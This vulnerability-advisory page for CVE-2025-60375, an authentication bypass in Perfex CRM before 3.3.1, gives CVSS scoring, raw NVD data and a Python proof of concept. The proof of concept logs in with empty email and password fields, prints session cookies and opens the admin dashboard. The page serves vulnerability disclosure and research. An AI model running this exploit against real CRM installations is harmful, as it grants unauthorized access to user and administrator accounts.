Security Vulnerability Report
中文
CVE-2025-60375 CVSS 7.3 HIGH

CVE-2025-60375

Published: 2025-10-09 21:15:39
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The authentication mechanism in Perfex CRM before 3.3.1 allows attackers to bypass login credentials due to insufficient server-side validation. By sending empty username and password parameters in the login request, an attacker can gain unauthorized access to user accounts, including administrative accounts, without providing valid credentials.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Perfex CRM < 3.3.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-60375 - Perfex CRM Authentication Bypass PoC # This PoC demonstrates the authentication bypass vulnerability # by sending empty username and password parameters to the login endpoint import requests # Target configuration TARGET_URL = "http://target-perfex-crm.com" LOGIN_ENDPOINT = "/authentication/login" # Step 1: Prepare the malicious login request with empty credentials login_url = TARGET_URL + LOGIN_ENDPOINT # Empty username and password parameters payload = { "email": "", "password": "" } # Step 2: Send the authentication bypass request session = requests.Session() response = session.post(login_url, data=payload, allow_redirects=False) # Step 3: Check if the bypass was successful if response.status_code == 302 or "dashboard" in response.headers.get("Location", ""): print("[+] Authentication bypass successful!") print(f"[+] Session cookies: {session.cookies.get_dict()}") # Step 4: Access protected resources using the bypassed session dashboard_url = TARGET_URL + "/admin" dashboard_response = session.get(dashboard_url) if dashboard_response.status_code == 200: print("[+] Successfully accessed admin dashboard!") print("[+] Vulnerability confirmed - CVE-2025-60375") else: print("[-] Authentication bypass failed") print(f"[-] Response status: {response.status_code}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60375", "sourceIdentifier": "[email protected]", "published": "2025-10-09T21:15:39.323", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The authentication mechanism in Perfex CRM before 3.3.1 allows attackers to bypass login credentials due to insufficient server-side validation. By sending empty username and password parameters in the login request, an attacker can gain unauthorized access to user accounts, including administrative accounts, without providing valid credentials."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-289"}]}], "references": [{"url": "https://github.com/AhamedYaseen03/CVE-2025-60375", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.